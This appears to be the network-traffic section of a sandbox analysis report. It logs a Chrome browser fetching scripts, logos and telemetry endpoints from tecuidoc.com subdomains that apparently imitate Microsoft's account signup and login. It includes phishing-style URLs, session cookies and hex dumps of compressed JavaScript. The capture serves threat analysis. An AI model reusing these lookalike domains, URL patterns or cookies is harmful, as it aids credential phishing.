                                              Connection: keep-alive
                                              sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                              sec-ch-ua-mobile: ?0
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                              sec-ch-ua-platform: "Windows"
                                              Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
                                              Sec-Fetch-Site: same-site
                                              Sec-Fetch-Mode: no-cors
                                              Sec-Fetch-Dest: image
                                              Referer: https://signup.tecuidoc.com/
                                              Accept-Encoding: gzip, deflate, br
                                              Accept-Language: en-US,en;q=0.9
                                              Cookie: wDwqvv="N2Q0ZjUzZjMtM2UwZi00OTBjLWE2M2EtNTdhM2YyOTllMmFmOmFkMDVlZDk0LThjMzItNDg2My05NTU2LTUxNTliN2U1MDcxOA=="
                                              2024-04-26 14:57:26 UTC736INHTTP/1.1 200 OK
                                              Server: nginx
                                              Date: Fri, 26 Apr 2024 14:57:26 GMT
                                              Content-Type: image/svg+xml
                                              Transfer-Encoding: chunked
                                              Connection: close
                                              accept-ranges: bytes
                                              access-control-allow-origin: *
                                              access-control-expose-headers: x-ms-request-id,Server,x-ms-version,Content-Type,Content-Encoding,Cache-Control,Last-Modified,ETag,Content-MD5,x-ms-lease-status,x-ms-blob-type,Content-Length,Date,Transfer-Encoding
                                              age: 465571
                                              cache-control: public, max-age=604800
                                              etag: 0x8DC61C01880D398
                                              last-modified: Sun, 21 Apr 2024 05:01:25 GMT
                                              vary: Accept-Encoding
                                              x-cache: HIT
                                              x-ms-blob-type: BlockBlob
                                              x-ms-lease-status: unlocked
                                              x-ms-request-id: 95fa7110-601e-00f5-27ae-937879000000
                                              x-ms-version: 2009-09-19
                                              content-encoding: gzip
                                              2024-04-26 14:57:26 UTC1442INData Raw: 35 39 62 0d 0a 1f 8b 08 00 00 00 00 00 00 ff bd 57 4d 6f 1c 37 0c fd 2b 8b ed 75 56 96 48 4a a2 0a db 80 7b f2 c1 be fa 90 db b6 b1 b3 06 ec 26 88 17 76 fa ef fb 28 51 b3 46 91 a2 c9 a5 b0 f7 61 57 1c 51 fc 7c e2 9c bf bc 7e da 7c 7b 7e fa f3 e5 62 7b 38 1e bf fc 7a 76 f6 f6 f6 16 de 38 7c fe fa e9 8c 62 8c 67 78 62 bb 79 7b fc 78 3c 5c 6c 53 d4 ed e6 70 ff f8 e9 70 bc d8 92 6c 37 af 8f f7 6f bf 7d fe 76 b1 8d 9b b8 81 74 83 c5 cb f3 e3 e3 f1 e9 fe 72 ff f2 72 7f 7c 39 3f 1b bf ce bf ec 8f 87 cd c7 8b ed ad 48 50 2e 8b 84 72 97 34 c8 61 47 41 ee 6a c8 ca d7 82 af 37 ac 21 a5 b6 98 ec 9a 4b c8 9c 6e 98 42 12 5a fa 43 87 5d 88 d4 fa d6 6b 6a a1 dd 41 d1 81 83 70 b9 e1 1a 78 49 a6 fe 10 62 d6 1b 49 21 4b b6 93 3e 3c d3 92 42 94 b6 4f 81 8a 2e 03 23 fe d2 12
                                              Data Ascii: 59bWMo7+uVHJ{&v(QFaWQ|~|{~b{8zv8|bgxby{x<\lSppl7o}vtrr|9?HP.r4aGAj7!KnBZC]kjApxIbI!K><BO.#
                                              2024-04-26 14:57:26 UTC5INData Raw: 30 0d 0a 0d 0a
                                              Data Ascii: 0


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              47192.168.2.649770198.58.99.334435372C:\Program Files\Google\Chrome\Application\chrome.exe
                                              TimestampBytes transferredDirectionData
                                              2024-04-26 14:57:24 UTC615OUTGET /jquerypackage_1.10_5V7LAuc3bNAQx2QQfr1RPw2.js?v=1 HTTP/1.1
                                              Host: bd6a002d-7d4f53f3.tecuidoc.com
                                              Connection: keep-alive
                                              sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                              Origin: https://signup.tecuidoc.com
                                              sec-ch-ua-mobile: ?0
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                              sec-ch-ua-platform: "Windows"
                                              Accept: */*
                                              Sec-Fetch-Site: same-site
                                              Sec-Fetch-Mode: cors
                                              Sec-Fetch-Dest: script
                                              Referer: https://signup.tecuidoc.com/
                                              Accept-Encoding: gzip, deflate, br
                                              Accept-Language: en-US,en;q=0.9
                                              2024-04-26 14:57:27 UTC740INHTTP/1.1 200 OK
                                              Server: nginx
                                              Date: Fri, 26 Apr 2024 14:57:27 GMT
                                              Content-Type: application/javascript
                                              Content-Length: 33956
                                              Connection: close
                                              accept-ranges: bytes
                                              access-control-allow-origin: *
                                              access-control-expose-headers: x-ms-request-id,Server,x-ms-version,Content-Type,Content-Encoding,Cache-Control,Last-Modified,ETag,Content-MD5,x-ms-lease-status,x-ms-blob-type,Content-Length,Date,Transfer-Encoding
                                              age: 465461
                                              cache-control: public, max-age=604800
                                              etag: 0x8DC61C01E2914B5
                                              last-modified: Sun, 21 Apr 2024 05:01:34 GMT
                                              vary: Accept-Encoding
                                              x-cache: HIT
                                              x-ms-blob-type: BlockBlob
                                              x-ms-lease-status: unlocked
                                              x-ms-request-id: 149e0ea4-a01e-00ad-58ae-93435b000000
                                              x-ms-version: 2009-09-19
                                              content-encoding: gzip
                                              2024-04-26 14:57:27 UTC6454INData Raw: 1f 8b 08 00 00 00 00 00 00 03 cc bd fb 76 db 46 d6 2f f8 bf 9e 42 44 fb 53 00 13 a2 44 3b 49 77 40 43 3c 8e 2f ed b8 e3 c4 89 9d 4e d2 14 ed 05 93 a0 04 9b 02 18 00 94 a5 88 ec 67 99 f7 98 3f 66 ad 79 a1 79 85 d9 bf bd ab 0a 85 0b 65 f7 f9 ce ac 39 e9 b6 88 4b a1 ae bb 76 ed fb 3e ba db db db bf bb ff fe a7 75 9c 5f ef 3f 8f 2e a3 57 b3 3c 59 95 fb df 27 ef f2 88 1e 5d 0e 07 c3 e3 c1 3d 14 3a 2f cb 55 70 74 74 6f 3e bf bf 58 7c fd d7 c3 bf ce bf 5c 7c 75 7f 71 7f 50 c6 b3 75 32 cf 66 83 59 76 71 44 25 51 f8 bb 74 b6 5c cf e3 62 ff 55 f2 e7 9f cb 78 f0 be b0 aa f8 eb df be 9e 7f f3 d5 bb d9 ed 55 3c ca 56 d7 79 72 76 5e ee df 3b 3e fe ca a7 bf c3 fb ba a7 4f b3 75 3a 8f ca 24 4b 7d 34 35 d8 8f d2 f9 7e 56 9e c7 f9 fe 2c 4b cb 3c 79 b7 2e b3 9c db fc 39 5e
                                              Data Ascii: vF/BDSD;Iw@C</Ng?fyye9Kv>u_?.W<Y']=:/Uptto>X|\|uqPu2fYvqD%Qt\bUxU<Vyrv^;>Ou:$K}45~V,K<y.9^
                                              2024-04-26 14:57:27 UTC16384INData Raw: 81 e1 d6 f4 91 42 46 86 57 b7 54 4a d0 dd b1 e6 d7 42 da 07 07 bd b5 11 98 d7 c8 7b cf 7e 65 7f 52 21 6a ee b6 be f9 71 e1 58 8d 11 22 10 b5 5f 6e 75 40 0c 4d b4 f4 8d e8 de ef e9 34 15 64 97 d6 6d 5b ab 3e a5 9e a8 b0 75 81 86 ad 6f ad 20 fa 63 c9 b4 3a ce e0 9a 1b 94 e9 97 f1 5b 32 aa 57 fb 43 d6 ea 32 77 ff 04 2f 05 4e 0c 4d 5f a7 70 94 97 11 af 54 d3 de a4 0e 4b db f6 c9 53 19 f0 80 eb 2b 31 bc e7 62 c6 13 9e 55 0c 4d 12 f6 88 83 98 18 f3 34 f8 f5 35 8c ab 60 ae e9 4d 03 51 13 bc 5b 27 cb b9 f1 d4 81 f9 33 4c 9f fc 84 71 40 e2 55 26 55 95 89 34 6c 52 2b 3b 6d cf 8c 57 7c 45 3b b1 30 5e 01 f1 e2 57 18 9e b1 7d 43 65 03 d9 41 61 09 23 aa 96 d7 13 db 12 18 03 7f c6 e2 17 da 07 ca 1c 0b 97 44 43 fc 0f a7 3a 26 de d1 fd d4 ba bf 2e 71 66 d0 69 87 c5 32 c7
                                              Data Ascii: BFWTJB{~eR!jqX"_nu@M4dm[>uo c:[2WC2w/NM_pTKS+1bUM45`MQ['3Lq@U&U4lR+;mW|E;0^W}CeAa#DC:&.qfi2
                                              2024-04-26 14:57:27 UTC11118INData Raw: 11 db 1a c3 63 19 2c bd 0a e4 56 e5 c1 ee 5e 08 2b 5d 73 05 c3 99 17 64 92 5d 93 7d f6 ba 7c 2a c6 1d 09 b9 2c 33 79 85 d1 f8 ac f1 58 48 6b 72 23 0d de 53 13 f9 f5 38 a6 f7 81 02 ec 40 95 17 d1 38 02 f4 56 13 34 56 20 9e 17 38 bd 81 6f 08 87 b9 7a 81 e1 d1 d7 36 32 37 98 b5 b3 97 5c a0 6e 92 c5 47 a9 09 a0 89 4c 2d b1 8a 69 70 11 d3 01 29 24 2b dc 1c e1 20 33 da 85 95 f4 fc e5 9e 0a 1c f4 6d 54 cb bc d4 d8 0e 20 14 74 28 05 a5 cb 8d 2f c5 ee 30 68 dc 1b 4d a9 e7 d9 9e 1e 37 9d 19 56 3b fc 4c b4 97 18 11 08 c3 61 cf 4e 1e 3c 2e 75 60 43 75 5e ec 52 37 cc 13 f6 cb ac 2a 75 bc ea 23 3e 5c 6e f3 90 6b 7f 2d 01 45 d3 56 9e 54 9d 22 05 c5 ed 4c f5 12 4a 0a a7 cd ae d2 78 9b 64 eb c2 fe 02 35 10 bc 7c 62 50 5d ed 7c fa ab 5d ed 7d ee 64 d8 ad ca 6c a0 c6 cf 9e
                                              Data Ascii: c,V^+]sd]}|*,3yXHkr#S8@8V4V 8oz627\nGL-ip)$+ 3mT t(/0hM7V;LaN<.u`Cu^R7*u#>\nk-EVT"LJxd5|bP]|]}dl


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              48192.168.2.649772198.58.99.334435372C:\Program Files\Google\Chrome\Application\chrome.exe
                                              TimestampBytes transferredDirectionData
                                              2024-04-26 14:57:27 UTC522OUTGET /images/microsoft_logo_7lyNn7YkjJOP0NwZNw6QvQ2.svg HTTP/1.1
                                              Host: bd6a002d-7d4f53f3.tecuidoc.com
                                              Connection: keep-alive
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                              Accept: */*
                                              Sec-Fetch-Site: none
                                              Sec-Fetch-Mode: cors
                                              Sec-Fetch-Dest: empty
                                              Accept-Encoding: gzip, deflate, br
                                              Accept-Language: en-US,en;q=0.9
                                              Cookie: wDwqvv="N2Q0ZjUzZjMtM2UwZi00OTBjLWE2M2EtNTdhM2YyOTllMmFmOmFkMDVlZDk0LThjMzItNDg2My05NTU2LTUxNTliN2U1MDcxOA=="
                                              2024-04-26 14:57:30 UTC736INHTTP/1.1 200 OK
                                              Server: nginx
                                              Date: Fri, 26 Apr 2024 14:57:30 GMT
                                              Content-Type: image/svg+xml
                                              Transfer-Encoding: chunked
                                              Connection: close
                                              accept-ranges: bytes
                                              access-control-allow-origin: *
                                              access-control-expose-headers: x-ms-request-id,Server,x-ms-version,Content-Type,Content-Encoding,Cache-Control,Last-Modified,ETag,Content-MD5,x-ms-lease-status,x-ms-blob-type,Content-Length,Date,Transfer-Encoding
                                              age: 465576
                                              cache-control: public, max-age=604800
                                              etag: 0x8DC61C01880D398
                                              last-modified: Sun, 21 Apr 2024 05:01:25 GMT
                                              vary: Accept-Encoding
                                              x-cache: HIT
                                              x-ms-blob-type: BlockBlob
                                              x-ms-lease-status: unlocked
                                              x-ms-request-id: 95fa7110-601e-00f5-27ae-937879000000
                                              x-ms-version: 2009-09-19
                                              content-encoding: gzip
                                              2024-04-26 14:57:30 UTC1442INData Raw: 35 39 62 0d 0a 1f 8b 08 00 00 00 00 00 00 ff bd 57 4d 6f 1c 37 0c fd 2b 8b ed 75 56 96 48 4a a2 0a db 80 7b f2 c1 be fa 90 db b6 b1 b3 06 ec 26 88 17 76 fa ef fb 28 51 b3 46 91 a2 c9 a5 b0 f7 61 57 1c 51 fc 7c e2 9c bf bc 7e da 7c 7b 7e fa f3 e5 62 7b 38 1e bf fc 7a 76 f6 f6 f6 16 de 38 7c fe fa e9 8c 62 8c 67 78 62 bb 79 7b fc 78 3c 5c 6c 53 d4 ed e6 70 ff f8 e9 70 bc d8 92 6c 37 af 8f f7 6f bf 7d fe 76 b1 8d 9b b8 81 74 83 c5 cb f3 e3 e3 f1 e9 fe 72 ff f2 72 7f 7c 39 3f 1b bf ce bf ec 8f 87 cd c7 8b ed ad 48 50 2e 8b 84 72 97 34 c8 61 47 41 ee 6a c8 ca d7 82 af 37 ac 21 a5 b6 98 ec 9a 4b c8 9c 6e 98 42 12 5a fa 43 87 5d 88 d4 fa d6 6b 6a a1 dd 41 d1 81 83 70 b9 e1 1a 78 49 a6 fe 10 62 d6 1b 49 21 4b b6 93 3e 3c d3 92 42 94 b6 4f 81 8a 2e 03 23 fe d2 12
                                              Data Ascii: 59bWMo7+uVHJ{&v(QFaWQ|~|{~b{8zv8|bgxby{x<\lSppl7o}vtrr|9?HP.r4aGAj7!KnBZC]kjApxIbI!K><BO.#
                                              2024-04-26 14:57:30 UTC5INData Raw: 30 0d 0a 0d 0a
                                              Data Ascii: 0


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              49192.168.2.649773198.58.99.334435372C:\Program Files\Google\Chrome\Application\chrome.exe
                                              TimestampBytes transferredDirectionData
                                              2024-04-26 14:57:28 UTC615OUTGET /datarequestpackage_h-_7C7UzwdefXJT9njDBTQ2.js?v=1 HTTP/1.1
                                              Host: bd6a002d-7d4f53f3.tecuidoc.com
                                              Connection: keep-alive
                                              sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                              Origin: https://signup.tecuidoc.com
                                              sec-ch-ua-mobile: ?0
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                              sec-ch-ua-platform: "Windows"
                                              Accept: */*
                                              Sec-Fetch-Site: same-site
                                              Sec-Fetch-Mode: cors
                                              Sec-Fetch-Dest: script
                                              Referer: https://signup.tecuidoc.com/
                                              Accept-Encoding: gzip, deflate, br
                                              Accept-Language: en-US,en;q=0.9
                                              2024-04-26 14:57:31 UTC739INHTTP/1.1 200 OK
                                              Server: nginx
                                              Date: Fri, 26 Apr 2024 14:57:31 GMT
                                              Content-Type: application/javascript
                                              Content-Length: 3505
                                              Connection: close
                                              accept-ranges: bytes
                                              access-control-allow-origin: *
                                              access-control-expose-headers: x-ms-request-id,Server,x-ms-version,Content-Type,Content-Encoding,Cache-Control,Last-Modified,ETag,Content-MD5,x-ms-lease-status,x-ms-blob-type,Content-Length,Date,Transfer-Encoding
                                              age: 465394
                                              cache-control: public, max-age=604800
                                              etag: 0x8DC61C00E1BF22D
                                              last-modified: Sun, 21 Apr 2024 05:01:07 GMT
                                              vary: Accept-Encoding
                                              x-cache: HIT
                                              x-ms-blob-type: BlockBlob
                                              x-ms-lease-status: unlocked
                                              x-ms-request-id: b14f8eb6-501e-00ee-5cae-93ed4c000000
                                              x-ms-version: 2009-09-19
                                              content-encoding: gzip
                                              2024-04-26 14:57:31 UTC3505INData Raw: 1f 8b 08 00 00 00 00 00 00 03 ad 59 5b 73 db 36 16 7e cf af a0 51 8f 4c 8e 60 46 49 db dd ae 18 44 e3 da 71 e2 dc 63 2b cd 83 e3 e9 d0 24 24 31 a6 49 96 04 2d 2b 92 fe fb 7e 07 e0 4d 96 d2 d9 9d dd 4e 1d 13 07 07 07 e7 7e 81 f7 26 65 12 a8 28 4d 6c 67 59 7f 5a d2 96 9d 95 a2 55 2e 55 99 63 a7 d7 93 6e a1 7c 25 85 88 7b 3d 5b ba 59 2e ef 9a 0f 37 91 f7 4a 48 fd cb e1 e6 b7 de a4 0f 8d 21 0c a2 c3 4f 84 00 31 fb a4 c1 de 37 80 fd 06 a3 be a8 e4 b2 3e aa c9 27 65 1c f3 c5 e1 21 30 d6 0d 93 3e 31 19 4d ec 2e 83 a5 b3 bc f3 73 2b 17 fb 5e 3e b2 f3 8a b9 9a 5a ee 0c 71 39 ae 95 cd 4d 20 db ef af 5b a2 13 28 65 ef af 5e 6f ef ba d7 5b f4 7a f7 cf e7 60 f0 5a cc a3 24 4c e7 6e 21 d5 38 ba 95 69 a9 ec 29 2f 1c a7 3d 77 47 cc 98 ab ed 44 ce ad 13 10 77 dc a9 c1 b7
                                              Data Ascii: Y[s6~QL`FIDqc+$$1I-+~MN~&e(MlgYZU.Ucn|%{=[Y.7JH!O17>'e!0>1M.s+^>Zq9M [(e^o[z`Z$Ln!8i)/=wGDw


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              50192.168.2.649774198.58.99.334435372C:\Program Files\Google\Chrome\Application\chrome.exe
                                              TimestampBytes transferredDirectionData
                                              2024-04-26 14:57:31 UTC603OUTGET /watson_DOaS_v-h3FCKtNPQv8zSLw2.js?v=1 HTTP/1.1
                                              Host: bd6a002d-7d4f53f3.tecuidoc.com
                                              Connection: keep-alive
                                              sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                              Origin: https://signup.tecuidoc.com
                                              sec-ch-ua-mobile: ?0
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                              sec-ch-ua-platform: "Windows"
                                              Accept: */*
                                              Sec-Fetch-Site: same-site
                                              Sec-Fetch-Mode: cors
                                              Sec-Fetch-Dest: script
                                              Referer: https://signup.tecuidoc.com/
                                              Accept-Encoding: gzip, deflate, br
                                              Accept-Language: en-US,en;q=0.9
                                              2024-04-26 14:57:34 UTC739INHTTP/1.1 200 OK
                                              Server: nginx
                                              Date: Fri, 26 Apr 2024 14:57:34 GMT
                                              Content-Type: application/javascript
                                              Content-Length: 4374
                                              Connection: close
                                              accept-ranges: bytes
                                              access-control-allow-origin: *
                                              access-control-expose-headers: x-ms-request-id,Server,x-ms-version,Content-Type,Content-Encoding,Cache-Control,Last-Modified,ETag,Content-MD5,x-ms-lease-status,x-ms-blob-type,Content-Length,Date,Transfer-Encoding
                                              age: 464714
                                              cache-control: public, max-age=604800
                                              etag: 0x8DC61C02683F6CC
                                              last-modified: Sun, 21 Apr 2024 05:01:48 GMT
                                              vary: Accept-Encoding
                                              x-cache: HIT
                                              x-ms-blob-type: BlockBlob
                                              x-ms-lease-status: unlocked
                                              x-ms-request-id: a1997c0a-001e-0023-6cb0-93b613000000
                                              x-ms-version: 2009-09-19
                                              content-encoding: gzip
                                              2024-04-26 14:57:34 UTC4374INData Raw: 1f 8b 08 00 00 00 00 00 00 03 9d 5a f9 57 db 48 b6 fe 9d bf 42 d4 e4 18 b9 5d 28 66 7a 7a e6 3d 3b 15 0f 8b 93 90 66 4b 20 49 bf 63 7c 38 b2 54 b6 45 84 ca 68 31 b8 b1 ff f7 f7 dd 2a 6d 36 e4 4c a6 39 dd 20 d5 72 eb d6 5d bf 7b 95 ed 71 16 79 69 a0 22 bb f9 34 77 63 4b 8a 87 20 f2 d5 03 8f 85 74 5e 1d c9 51 36 e1 11 3d 1e aa 68 1c 4c 78 4a cf df e4 e8 9b 9b 26 2a 5a 7b 59 2e 9f 56 5c d1 d0 01 0f f4 6e c5 5d fa 7b 1e c9 a3 84 66 bb 81 f3 30 95 91 cd 6e 3f 65 32 5e 30 5e 3b bc 78 b4 92 9c 13 62 20 54 9e 4b 83 ce 2c 56 a9 f2 54 b8 5c 32 d6 8d 65 9a c5 91 15 3b 9e 8a 30 6f b3 d7 af 19 af 2d 9e aa 24 8d dc 3b b9 5c 6e 0c 36 57 e5 29 9e 2d 9b 4f c1 98 7e a7 f1 22 3f f0 75 39 6d 3b 4f 7b 7c d5 bc b6 5f e3 f6 b1 23 1f 25 36 d0 79 49 1a 67 5e aa 62 27 55 97 69 1c
                                              Data Ascii: ZWHB](fzz=;fK Ic|8TEh1*m6L9 r]{qyi"4wcK t^Q6=hLxJ&*Z{Y.V\n]{f0n?e2^0^;xb TK,VT\2e;0o-$;\n6W)-O~"?u9m;O{|_#%6yIg^b'Ui


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              51192.168.2.649776198.58.99.334435372C:\Program Files\Google\Chrome\Application\chrome.exe
                                              TimestampBytes transferredDirectionData
                                              2024-04-26 14:57:34 UTC2258OUTPOST /handlers/Watson HTTP/1.1
                                              Host: signup.tecuidoc.com
                                              Connection: keep-alive
                                              Content-Length: 8391
                                              Cache-Control: max-age=0
                                              uaid: 86a53df4895b44e08756194225f0ef29
                                              x-ms-apiVersion: 3
                                              sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                              sec-ch-ua-mobile: ?0
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                              canary: V7Xn2trOJMWKhFvNmN0CFp9exPqBlyzVBJSTlFSX44dSsP1+SQItoXK1z94RyzXfWiZvnmhU4fT3Vs69crL3R4oPbSnxaWmL1Pv7+24J7CtIMcj3EgJUgmSN4M7t7y6zMTbEJ6AwHbeDr2ZoaCet4CDqyIWvJp87NHVugopQP4+HrmxGBfG/BLkfZ+4Ygb1CFykz+wyRdMPA5P8tdxrE6c6Qy7Ptf9J4SfTjGrIpcPg+U5LZBi6OmuVQtB69Q3EL:2:3c
                                              Content-Type: application/json; charset=utf-8
                                              hpgid: 200225
                                              Accept: application/json
                                              tcxt: 0wXTfn3I+Mlg+dSL+3Zrob3kXCaCkOLMmQ1oTQqyJYRhXscFH1g8xsIlchNLX2VrG1Va7bCmDHHU8TA6LuhK45UOCauNzA9qhFCdlTZ6g08wCVypXltcY3LWnADwvGTkMwE3GzOJU43v+hFegnAJrR3sXX217xvrEIJ5v2/LoDVNBpNhinkR0Zo6HGgrcvqQgwy/nlU02Q3eKvYn6ClikIPJVqSOkM2+OzzB3QT01idLK1rNyG/qCFEg3iRjiiZvC75yTVhBMbjScbN7Ls5SsVyc8B4r6FIAIEFSV00RyTxW/3aFFS6u682h8kHSgD0h09AdM+xK9RGCPEijeHo3GYsmuiRgZ2jWdoWJm1/ou5X0dGsUivmK22YB/VOUFYIwA/jIAN3nqe6cblrS/Ez5P7Qh7MtI1riFg+qtpB5a602cNcTwuC0ju1Y5QEhSt9UCL9AqCivlhaWENVB4mj5jixfUDI/hbCCT0Fx0CNzn1w4AExepRilMRWNf6vGwtgoedjqXjgCvUiLKoIFpVl4IJV90l3ikT7VPc9G+dksvhlsORKLGkrJt4CI201EL3cyYricjSYUpLgV+eGb/LPr4jbdBd7e7L5u6TLTSsnycYbk=:2:3
                                              x-ms-apiTransport: fetch
                                              sec-ch-ua-platform: "Windows"
                                              Origin: https://signup.tecuidoc.com
                                              Sec-Fetch-Site: same-origin
                                              Sec-Fetch-Mode: cors
                                              Sec-Fetch-Dest: empty
                                              Referer: https://signup.tecuidoc.com/signup?sru=https%3a%2f%2fl1ve.tecuidoc.com%2foauth20_authorize.srf%3flc%3d1033%26client_id%3d51483342-085c-4d86-bf88-cf50c7252078%26mkt%3dEN-US%26opid%3dB6E95959DB8DBA86%26opidt%3d1714143427%26uaid%3d86a53df4895b44e08756194225f0ef29%26contextid%3d5ABD0222F1D086D5%26opignore%3d1&mkt=EN-US&uiflavor=web&lw=1&fl=easi2&client_id=51483342-085c-4d86-bf88-cf50c7252078&uaid=86a53df4895b44e08756194225f0ef29&suc=https%3a%2f%2f2a9e5726-7d4f53f3.tecuidoc.com&lic=1
                                              Accept-Encoding: gzip, deflate, br
                                              Accept-Language: en-US,en;q=0.9
                                              Cookie: wDwqvv="N2Q0ZjUzZjMtM2UwZi00OTBjLWE2M2EtNTdhM2YyOTllMmFmOmFkMDVlZDk0LThjMzItNDg2My05NTU2LTUxNTliN2U1MDcxOA=="
                                              2024-04-26 14:57:34 UTC8391OUTData Raw: 7b 22 62 69 63 69 4e 6f 4c 44 50 61 72 73 65 22 3a 31 2c 22 65 63 22 3a 22 52 65 66 65 72 65 6e 63 65 45 72 72 6f 72 3a 52 65 66 65 72 65 6e 63 65 45 72 72 6f 72 3a 20 55 6e 61 62 6c 65 20 74 6f 20 70 72 6f 63 65 73 73 20 62 69 6e 64 69 6e 67 20 5c 22 68 74 6d 6c 3a 20 66 75 6e 63 74 69 6f 6e 28 29 7b 72 65 74 75 72 6e 20 73 74 72 69 6e 67 73 2e 75 73 65 72 6e 61 6d 65 50 72 65 66 69 6c 6c 53 70 65 65 64 62 75 6d 70 44 65 73 63 2e 66 6f 72 6d 61 74 28 70 61 67 69 6e 61 74 65 64 55 73 65 72 6e 61 6d 65 50 72 65 66 69 6c 6c 29 20 7d 5c 22 5c 6e 4d 65 73 73 61 67 65 3a 20 70 61 67 69 6e 61 74 65 64 55 73 65 72 6e 61 6d 65 50 72 65 66 69 6c 6c 20 69 73 20 6e 6f 74 20 64 65 66 69 6e 65 64 22 2c 22 77 65 63 22 3a 22 33 34 22 2c 22 69 64 78 22 3a 31 2c 22 73 63
                                              Data Ascii: {"biciNoLDParse":1,"ec":"ReferenceError:ReferenceError: Unable to process binding \"html: function(){return strings.usernamePrefillSpeedbumpDesc.format(paginatedUsernamePrefill) }\"\nMessage: paginatedUsernamePrefill is not defined","wec":"34","idx":1,"sc
                                              2024-04-26 14:57:37 UTC698INHTTP/1.1 204 No Content
                                              Server: nginx
                                              Date: Fri, 26 Apr 2024 14:57:37 GMT
                                              Content-Type: text/html; charset=utf-8
                                              Connection: close
                                              cache-control: no-cache, no-store
                                              pragma: no-cache
                                              p3p: CAO DSP COR ADMa DEV CONo TELo CUR PSA PSD TAI IVDo OUR SAM BUS DEM NAV STA UNI COM INT PHY ONL FIN PRE PUR
                                              x-ms-amserver: SCUXXXX0001 (2.0.3311.1)
                                              x-ms-amserver-tm: 15ms
                                              x-ms-request-id: 8060454e-efd7-443c-8e5a-91ba8b4d5a94
                                              referrer-policy: strict-origin-when-cross-origin
                                              amserver: SCUXXXXIG000001
                                              x-cache: CONFIG_NOCACHE
                                              x-msedge-ref: Ref A: 8060454EEFD7443C8E5A91BA8B4D5A94 Ref B: DFW311000108027 Ref C: 2024-04-26T14:57:36Z
                                              access-control-allow-origin: *
                                              access-control-allow-headers: *


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              52192.168.2.649775198.58.99.334435372C:\Program Files\Google\Chrome\Application\chrome.exe
                                              TimestampBytes transferredDirectionData
                                              2024-04-26 14:57:34 UTC688OUTGET /7d4f53f33e0f490ca63a57a3f299e2af/ HTTP/1.1
                                              Host: srmcorp.tecuidoc.com
                                              Connection: Upgrade
                                              Pragma: no-cache
                                              Cache-Control: no-cache
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                              Upgrade: websocket
                                              Origin: https://srmcorp.tecuidoc.com
                                              Sec-WebSocket-Version: 13
                                              Accept-Encoding: gzip, deflate, br
                                              Accept-Language: en-US,en;q=0.9
                                              Cookie: wDwqvv="N2Q0ZjUzZjMtM2UwZi00OTBjLWE2M2EtNTdhM2YyOTllMmFmOmFkMDVlZDk0LThjMzItNDg2My05NTU2LTUxNTliN2U1MDcxOA=="; AADSSO=NA|NoExtension; brcap=0
                                              Sec-WebSocket-Key: /dtL2oJ7s2rDgfnvkQ6REw==
                                              Sec-WebSocket-Extensions: permessage-deflate; client_max_window_bits
                                              2024-04-26 14:57:37 UTC740INHTTP/1.1 404 Not Found
                                              Server: nginx
                                              Date: Fri, 26 Apr 2024 14:57:37 GMT
                                              Content-Type: text/html; charset=utf-8
                                              Transfer-Encoding: chunked
                                              Connection: close
                                              Vary: Accept-Encoding
                                              cache-control: private
                                              p3p: CP="DSP CUR OTPi IND OTRi ONL FIN"
                                              x-ms-request-id: a74a6ae5-db85-4370-b75f-8692965b4801
                                              x-ms-ests-server: 2.1.17846.6 - WEULR1 ProdSlices
                                              report-to: {"group":"network-errors","max_age":86400,"endpoints":[{"url":"https://7457d826-7d4f53f3.tecuidoc.com/api/report?catId=GW+estsfd+ams2"}]}
                                              nel: {"report_to":"network-errors","max_age":86400,"success_fraction":0.001,"failure_fraction":1.0}
                                              x-ms-srs: 1.P
                                              referrer-policy: strict-origin-when-cross-origin
                                              access-control-allow-origin: *
                                              access-control-allow-headers: *
                                              2024-04-26 14:57:37 UTC5INData Raw: 30 0d 0a 0d 0a
                                              Data Ascii: 0


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              53192.168.2.649777198.58.99.334435372C:\Program Files\Google\Chrome\Application\chrome.exe
                                              TimestampBytes transferredDirectionData
                                              2024-04-26 14:57:34 UTC747OUTGET /images/2_vD0yppaJX3jBnfbHF1hqXQ2.svg HTTP/1.1
                                              Host: bd6a002d-7d4f53f3.tecuidoc.com
                                              Connection: keep-alive
                                              sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                              sec-ch-ua-mobile: ?0
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                              sec-ch-ua-platform: "Windows"
                                              Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
                                              Sec-Fetch-Site: same-site
